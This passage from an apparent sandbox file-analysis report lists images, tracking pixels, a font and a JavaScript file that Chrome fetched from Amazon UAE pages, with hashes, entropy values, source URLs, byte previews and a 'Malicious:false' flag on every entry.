                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 281x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18106
                                                                                                                                                                                                                                                                      Entropy (8bit):7.949953160407647
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:QUdFj5SE93aLShvWX9Ic9hLcRzpL+VvufXuhQbWMq04mCQ:QUdlYmgx6yhLcJZ+MuhuC04BQ
                                                                                                                                                                                                                                                                      MD5:2B268DA69B1CF0AF6F94821FB607BD01
                                                                                                                                                                                                                                                                      SHA1:0088D488521BB2339A87879988D9A744DCC0B4F0
                                                                                                                                                                                                                                                                      SHA-256:C4DB515A6482A7B3B90603FD3BBB8D229C2567E04AFF2D3301AC727E735A75E6
                                                                                                                                                                                                                                                                      SHA-512:908D164EE717C4AC99062A6009B4559DE95222576823B55705BB8C16A4DDEEDA1C06E411B33435EE9FD440E957BB6E1DEAFC7D2C03ABFDA53ACD51D411AAB056
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61SOdIEAB3L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6...................................................................`p:..;}..N..............,.bLI...U....a.=.n'X..n:0{1f%.n!.T...3p.{.g...Q..w......c.w..Qy*>..y.9..............`..9.Ul...Q..L,.7.ohh.l.....A..r....8.-W......`|f$.k.......h.].(..iz..H.>?.F..G!..!o...6@....UNL....Ez..Ns.8.#...%v\.5.....;".$Z.....Kt...r...X......:L.L.86.."....o...}.....0~......b'..D...]..n......Z.=..+y.w$6\g0...9....c...pc.....(...u.....<M......U.k..!....6WV._wi..2..`.}Z2.Z...7R..Z.=u..,.,.K...B^.D...=..........p..........35..w..m..[......sH.}...PI.....4....<..N...._7{.\..-.....n9)....."H................[.+.!...&........Vj7]s...}........=.f...%.^a.]x..N..t.'G.(....D6q.V:9.r..[..],{Y.[.._.ib...} v.:....O..5.F...>.|..}..I.J.XT.R.:^...f.Cs...|.J.2............`V....<.p...V9...\]....!...y.1z...j.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 241x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6971
                                                                                                                                                                                                                                                                      Entropy (8bit):7.860949662809683
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:qyvxtaUfNIkWoWx0ABMZrxzL6Ja4tJn/uAJTLVf:qQxtd9VSaOhthNJdf
                                                                                                                                                                                                                                                                      MD5:C844BFC508F931454110AF6F01DAB5A1
                                                                                                                                                                                                                                                                      SHA1:05AE7443226E310F528067A9EF7404C3DAB9F8BD
                                                                                                                                                                                                                                                                      SHA-256:003B07231366BA21E6EF6AD8660BD63976010E2A53063373C0716AD211CA5847
                                                                                                                                                                                                                                                                      SHA-512:553754D86CFB3038836F8CB3D0C78104B9233759B78F642B134ADE683DDE2E727A2AD966035BDD9185A2EBA2C90515DB51752E75F26900F935D144F91886F980
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.......................................................................+....%..\.?f..."..(..............A.&.S...U'\u5....:X..6J............m......US~......q..=..o..".<.b.+...............%t.P.gw...o...z.v.......e....$.p..R4J.3/"............i.m.c...L....z.m&...].....[u..W.,F.~F.T>...".p...........F..d.....+....Mjpc.'......o.,.....SMLk.]tz...oQ.M@......P..y..<D].D..^j*...q..9m..~.Yx..\.5]}.K......].Ue.....&..`k.G..z.3...........wmC..-..P.-....f)f..&me..GggD....e4..n.)..Y.....p....I.`fP......`a..../.v{.I.....+.V[...0..Y.....f9{..x.g.^e.....5X.L..#.. O.q..\..$..A.?.m..t6./.y.U<.62....G.0._ P..h|h.u*.j.....K."T...#a.H.V\.=[.V3Q....O.....G....p..U.%t.2.H.Y.K(.D.MtKXs.d..),..H.......Y..8.....b..&.....z.....a.s....l....`c.Y.!.... $F.|..7.. ....N ............0.........................1....!"02 A.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 182x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6244
                                                                                                                                                                                                                                                                      Entropy (8bit):7.93077711947864
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T5voGiLXRsmLGGNcHn+mQC53OLP/6wsbHy4DK6/3vfkt2kREdM7SqINpSOESZ2R:diw1+mQsW36wsbHlt3nktTL2VAvSMR
                                                                                                                                                                                                                                                                      MD5:6D1F876B2D01D7083D8DC4FEBD4CC548
                                                                                                                                                                                                                                                                      SHA1:61818BB8279FFD6B06EDC2B309BB76224CA42E9B
                                                                                                                                                                                                                                                                      SHA-256:4D30461C567C684BC2D530ABC0571E8A4CFBF4D882E9E40E3A5E8511826DADB6
                                                                                                                                                                                                                                                                      SHA-512:3879A290C88C10AC80809D6FE207D3B8A19CB92D2D7EDD16BCB1CFD633BAA389AE9158C8C73D603C424D3DA417F2E73DD48851CD9FF1B5B2B11FA4A6BF45C458
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61pSl2mowNL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1."Qq.2Aa..#Rr....3BS...bcs...$45Cd....DT..................................................1!2"A..Q.............?..])J.)J.)J.)J.)J.)J.)J.)_.e.[;.....l.;S.#.........../!..g...3.y.l.Y.Bpf..~..d{h.'.k.;b....L......~.~....ue..!m_....c?.........(...I...C....l*..RQ...N.qP.......+Y..b...I]...A...f..!.-../ E..D.j.....q....IX....,.b.=.......h..|)9/.Q.d.Whu..r...,w.R.P.)@.)@.)@.)@.)@.)@.)@.)@.)AO.x.C.776H''&."...#......w.....Q.`MJI.'*..v........;...Z.$.+.......D,.)g(.*..y......,.X.-...s....gR......i...1Cv..........N...J.i..[m..X..H.B"*...0....gp.1.4M..AV.y..[.|...R...+L..(..(..(..(..(..(..(..(..(<.....I.\:6.............7..\.M.9.V...:@c...'F..gn..^.....Z>.g.....2<..m...B\s.."G..&..}3.z.]..6aZ8.......7.%.r.$.....,LW.8A..:a..U.....O.U..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D27099%26pc%3D49221%26at%3D49221%26t%3D1724264968415%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://aax-eu.amazon.ae/x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1724264921.256,%22ttv%22:1724264921.256%7D"
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9083
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7750492274514516
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1mNhXUdnAAylDDLY7llyyyyyyyyyyyyyyyyyyyyybS0eKX96OcjKeFrrjPQXv:1+wgDLgDyyyyyyyyyyyyyyyyyyyyyXhl
                                                                                                                                                                                                                                                                      MD5:248E52DE407C28D0602B6E60B748D765
                                                                                                                                                                                                                                                                      SHA1:18DAE3282693BD13864A45766E1D76761E25E4CF
                                                                                                                                                                                                                                                                      SHA-256:CC32870F0A925F22F83419AAFFB4E8FDDE6A0EFCB92C0B0B74278FDCA3C18C0C
                                                                                                                                                                                                                                                                      SHA-512:09BEB264880CB248FE4DF5112CA11B66003974B2A800E1C4C5F6B46794F2AFB1846D73BD2D774FF517E88570588D2F4C0D4E3DD5E32EA7F1B870919DF0DFC038
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................@........................~.......................;...........". .T@..4............................=;..[.......D_.....'......D7...........Q....$........."v7.(..t........;............BS2...P...w..Dg.._u...5.d...i~.Bm...Ux.....ju.DT5...u.L.J...^*Z./.._.....................zv.U...fkV...w....u.+...i.Z+TX....!&..:5f../.....I....2..u.........z...........;..........DS...w?.U.g.C'..{...oM.@N@h.,..u..1..=r_.u..Y>...4....g...p...G....O.e........~?........Y.h`........................................;.........................w.....................................................F.sJ.\.vv.1S.3p.......u.....KL.}+.MT..x.............#...cs*d........................................................p...........# ......;}..84..H..W?]....ug].H...F@...._..J.Qf.|..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21859
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2813610728948435
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:q4lRe4Tkiep43TsqMQCCYnf5NhE7mlkGWJ1vF2cq/cseGp5aBfaZYjMgctFF:3443sqMQCdnf5NW7mnWJ1pq/d5aaYjMf
                                                                                                                                                                                                                                                                      MD5:525AAAA44C9029AD136CCF501E7AF292
                                                                                                                                                                                                                                                                      SHA1:74DC413F3074E51D29454A3C796825818ADE09AA
                                                                                                                                                                                                                                                                      SHA-256:12984FEA3A55815160E8DA89604A431BBB597E577B07594D9F2BBDEEFEB1B760
                                                                                                                                                                                                                                                                      SHA-512:0EC4B3850A771420DFC84D6A24EE638C875E6DED21BE21C7372D6D2B4960309D3452A3E845FB13C962ED58B906B063EA310C7B99E804DCC5F81CE297473C8378
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/41k9TQrnHzL.js?AUIClients/AmazonRushFramework
                                                                                                                                                                                                                                                                      Preview:(function(k){var p=window.AmazonUIPageJS||window.P,q=p._namespace||p.attributeErrors,c=q?q("AmazonRushFramework","AmazonRush"):p;c.guardFatal?c.guardFatal(k)(c,window):c.execute(function(){k(c,window)})})(function(k,p,q){k.when("a-ajax","a-util","3p-promise","rush-asset-loader","rush-util","rush-metrics-adapter","rush-dispatcher").register("rush-ajax-controller",function(c,g,e,h,b,f,a){function d(a,d){if(!a)throw Error(d);}function u(){}function l(b,c){var f=b[0];b=b[1]||{};d(v(f),"`dispatch` chunk must have a name");.a.trigger(f,{data:b,memo:c});return e.resolve({name:f,payload:b,memo:c})}function r(a,d,b){var c=a[0];if("title"===c)document.title=a[1];else if("dispatch"===c){var f=l(a.slice(1),b);f.then(function(a){d(a.name,a.payload,a.memo)})}else d(a,b),f=e.resolve();return f}var m=g.extend,x=b.isFunction,v=b.isNotBlank;return function(a,b){var f=[];var g=b&&b.success||u;var l=b&&b.error||u;var n=b&&b.chunk||u;d(x(g),"`success` must be a function");d(x(l),"`error` must be a function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 16616, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16616
                                                                                                                                                                                                                                                                      Entropy (8bit):7.986966282975233
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:0qJzQ61qLjMj2JfDC3uq2B/YgduJyovfw4TQRJGL7VGhX8aJl/hObP:x8LHMjGbCeqEFuBwkqJGLhGhVLsP
                                                                                                                                                                                                                                                                      MD5:4AFCD3B79B78D33386F497877A29C518
                                                                                                                                                                                                                                                                      SHA1:CC7EBAA05A2CD3B02C0929AC0475A44AB30B7EFA
                                                                                                                                                                                                                                                                      SHA-256:CDED49F94FC16DC0A14923975E159FBF4B14844593E612C1342C9E34E2F96821
                                                                                                                                                                                                                                                                      SHA-512:2DC9FFF1D57D5529C9C7BFF26FA9F3F94ADC47E9CEF51D782E55ECF93045200140706AB5816DFD4A0B49B8DB2263320FA2F0FA31A04E12D0C91FEA79B127255D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIFont-amazonember_rg-cc7ebaa05a2cd3b02c0929ac0475a44ab30b7efa._V2_.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......@........l..@.........................?FFTM..8..z..@.`..~.....P..9.6.$..F..<.. ..,..a?webf....5l.F..VU..#7.Q...d......k...r....{.T....2KuI.1.+j...(..kvf8...7.+.&.....t..!Z..C...>..=.....v.9_.% .L.....z..........0.e....;.7>.d..S..[..&/....=.9w.n...=.FH.h$...<....s.s.F..`...c....@...}.MP.@.A`T+..J.,F..XT....@..c......TH....OZ..u.....V..u..g...#..~"...Df.\M..-...n.Cu..{f..@.b{B...x......2..;.B...Ah.).....m...Q`!V.IH.pG...T.mb..p.[.v....Z=..P...I.,....m....;..Hva.*..@..x..:.....=&'G. ..0.....Mi...LC...t6..N5..m.........TH.....mY#..g..#.$...7..}...cS{..!.'..n..3...0......lw..D.,l..x...hH.I..lZ.]...4h/..>-A...wAv....W..KeYj{.V[c..d...d/..1.g.(:..5......h.(;@..........0..]+my.qdQ.>..JGu5.v2.3/.)..h.I2.P.. ....P..l......UU..#.d......R..x...)..d...2.....ov..%'..R5.97jA.._...m#..:.Z..r..5.!1.a.`..o.\<.4..j..._.......+Y)E......."A$..-._........c.C-.\....C../C..>..;T.@K...aB.o}t.>..~...>............uP|..\|.....1.. x....-%.....<>.$M..(..e......Un.rf0
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x280, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10706
                                                                                                                                                                                                                                                                      Entropy (8bit):7.915794968661681
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1OL4yju9DzsbhraScn8MlFuvYH28jVEeb4GP3mNi83lmyLOwkNrMAgGf:1OLNjututaSc8MlbjVEeb4smt4/rMAgu
                                                                                                                                                                                                                                                                      MD5:6837BA0E008DA04BB2463DCC4C3C4E96
                                                                                                                                                                                                                                                                      SHA1:1DE210818EE3130FDD4471CDA41FD682743EFB41
                                                                                                                                                                                                                                                                      SHA-256:C1D9E1926CC1A94A578B8F150B452C144DB52584868595F651CF2F9969121FAD
                                                                                                                                                                                                                                                                      SHA-512:EDECCBB53F8A0F44A8E3997F3907F67C19CE7602412F3DBCA584107659BCB413624F688E65DAC840975ADDB1D76E573F6CDE712F3D6A86E2F9E6FA9E8C95F7FB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Price-U49-440x280.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................@................:H..Y......n........BbX@..,.K.....`.u.....>....................;....6W......eg..........1.Hx........... .............{h..ZP&[j.......^..yfP7.M.zy.-.g:=|..kx~........+....6..3..1....B!W&....[.P...L`.../?j......nJ.}$.-....(....D.@.....'T.......t.._..k.R.a...L/...<~.....OM..Tu.T.&.Kso....D....T.........................i......-.@.D(......WA../..........^....g.4..DIf[..^.....<Ah.pzNQxm........?..g.U."....q..t6.6W.....t/....m.=bo..6..p T`.}?.......n.5o.U...n..../..=.....=Q..V..P..lq].@X.mG..h...n.[..>...A....wOh.....-....]D.....".BK.......-.'.tD..~.............O.....S...K8A.Pm:w......5.^..~.t.\....?.........W.1.].0.s.-+..D:6ML.[..XtP...'...?A..=k.4..h0yg.%{...'..%.I...q.0>..<S{7.A.@...s...........>.......w}..@......zX`..........L.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):34229
                                                                                                                                                                                                                                                                      Entropy (8bit):7.909120758491159
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyhZIsR3pVKBnKMVrxZXvE8amjfbaT8eIb75M46j4:4HD3WBKMVxjDjfby3IU0
                                                                                                                                                                                                                                                                      MD5:5280E1CEB7B08AA6A732BB909E44DA65
                                                                                                                                                                                                                                                                      SHA1:7DDC2E6EF5F01A0036DBB2BC8EAD7D7360C75CD1
                                                                                                                                                                                                                                                                      SHA-256:2F3AFFD6B46A7BF8DAB132B91FB03F7E52F553FF3DC61C3630F12F5E345DC4E3
                                                                                                                                                                                                                                                                      SHA-512:F9B9B7B73BDF03B13F2F5F4F97FE0AB57AD88DEB33F9FD3AB8701F63A9349F941E9DF1285433465811D3A8D6B522740CE2CA119F5082BC7754B8753DE845B7D2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/beauty/BUW24/AUG/2407GH039_AE_BuW23_Bubblers_CL_Generic_400x400_EN._CB565217449_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4101
                                                                                                                                                                                                                                                                      Entropy (8bit):7.901027181559413
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:71psnyB1Oo4ee++7utVVFfMj0JL0R4ch8zJykJWe2/1:hvB127ut3FAMoRWz2/1
                                                                                                                                                                                                                                                                      MD5:8ED67B5BEEEF77DAE26426C10B5748F3
                                                                                                                                                                                                                                                                      SHA1:29893FB119AA6F62F7594D319824BFA1FBDBFC08
                                                                                                                                                                                                                                                                      SHA-256:1108FDB921BC423D6C18352AD62719C886B43CFB313F2C0BC4D84E49DE21FC97
                                                                                                                                                                                                                                                                      SHA-512:7E3C3C0D6D9B55F12E0E77F341114A839140939909DA01537B1371F0E595905514A43E8600B67549CC21E9B0F2A86DD8A2CCEA0A48601476BCE080B94A5C4D23
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."...............................................................!.1AQ."2a.....T...Sq....#BDRt.5Cbcr.......................................................!1.....2AQa."q....B....#3CR............?...B...i.aO)./..Z.....}).IUSN.f...2...!-..{]..Vx.....h...T...\....fO#.).../...E.....-i.]o..G......=.2.x-..l.9;..,s.ey....h6+l...L`l.;.R&..{..h{.2.M....?.J.O...A.l.K.\-...)E.....77....Ri..:.....|........,..,;..0.I.T.V.M..:=/v.X.mu.-..a.;.8..5.x.HfS.hy.......C8..C..........$M..{!.JK.....o|..-{....<..h2{..%}.;...E_UA,..T.....9s2.qYOE.A8..f........H..!.4[.%-.W....KQbFa.)......!.....x-{.......K..Owo..-....5..]K...q.....>.l...o...*)p:y...X...5...N|.o..N[..k.;..q...X.0<uL7..$...<.;....-c....<g.'.)=.x.......&.3.....+...E.7...M...".0LJ...j.S.92.2HA.=.".".@L.q?.T.z.6.?*~....K.v0^..~o"@:.H..h.....i.3.hr{.|g.t......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13979
                                                                                                                                                                                                                                                                      Entropy (8bit):7.936123560673966
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:cjvhKjnc/CuQAhHYnmiZkt2jAxhejU0BLv0W:cjqnc/CktYnqtJUowL
                                                                                                                                                                                                                                                                      MD5:5E35B25AA7E9315564A80612D9F41775
                                                                                                                                                                                                                                                                      SHA1:37B5A58244AE2383F5D7F4D614330AFB3AB306E1
                                                                                                                                                                                                                                                                      SHA-256:0FA47274EF7A4E2A0BC046ED2B880D5FDCD8845465FBA98CD1AE615CF86E52AD
                                                                                                                                                                                                                                                                      SHA-512:392AFE004753E2DF90E1B537EEC82D41D1FC5F127116C79418CAA22C9D03F7F072E2A7EE7A215ED6172FF1374BA4FBE3AB84BE8F67919A2BE663A0AAB3AA021F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51gIRpQKHHL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5........................................................................5......qp..3or.YW................C).....q>^<.i.wn.l....k@.a....v..(...........Onq..@..0.&.k.S.....z<.&.h..r;.....y=w&4....\.c5.c8....S......F.A.....c.....'..0...r..z........7.M.C...s.&2/.$.....{ypW".o.....?./(.`.......3'..3....x.g.....g]........<..U..^....v.o.......o.#9..lK|4.y.{.5..*u.....b..2....w..~....|y.fG.I.k./...q...+Z7k.1.vR=..b.et..J..k....ja..........d...`...q..=_6g...|..m.8.}..>[..%sgO..q...8...x..l....o..i......1.,nK....? .".y.|....v......vvu..k.|=._...WY..k$...f.u.b:.2..._S......}..&.....3'...!.....k^.8....9...B?...lw<.........-\e_I.....t.....^.?NNh...M.,..@]....9......p.....|.S..O.....o-y..:..k...w.Xb...G....O....`..-.9...h...VR..........{......!..q..}..G...z....<Ry..6..."W...7......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.966320871762345
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1+G8MpQcJbYQbHK1+TdMeEuI+WHUvLJm/BDx7oTuepiVyPdWHvmnVlBSXTv6K4Mx:1+GPjhvTdkuIpYJmJDCpiEFWPmxaTvdx
                                                                                                                                                                                                                                                                      MD5:47DD1387F6D2EDD32CBB1F89422E047E
                                                                                                                                                                                                                                                                      SHA1:29A93B5A157E4BA8CEFD7E93CE91DE3B065087F8
                                                                                                                                                                                                                                                                      SHA-256:FC3C28D21EC4CD155EF0CDA2B4BC0EE9C0354941303188EEFD222E6B3CA0C8D0
                                                                                                                                                                                                                                                                      SHA-512:8C9287D99E203454D29129236E83CB334856552BEAA47D5DD9ED8D221DB689BDAD672836238AECAF843A63D626F0C24FBF7412DEFB6953ABD6A7753FB772084E
                                                                                                                                                                                                                                                                      Malicious:false
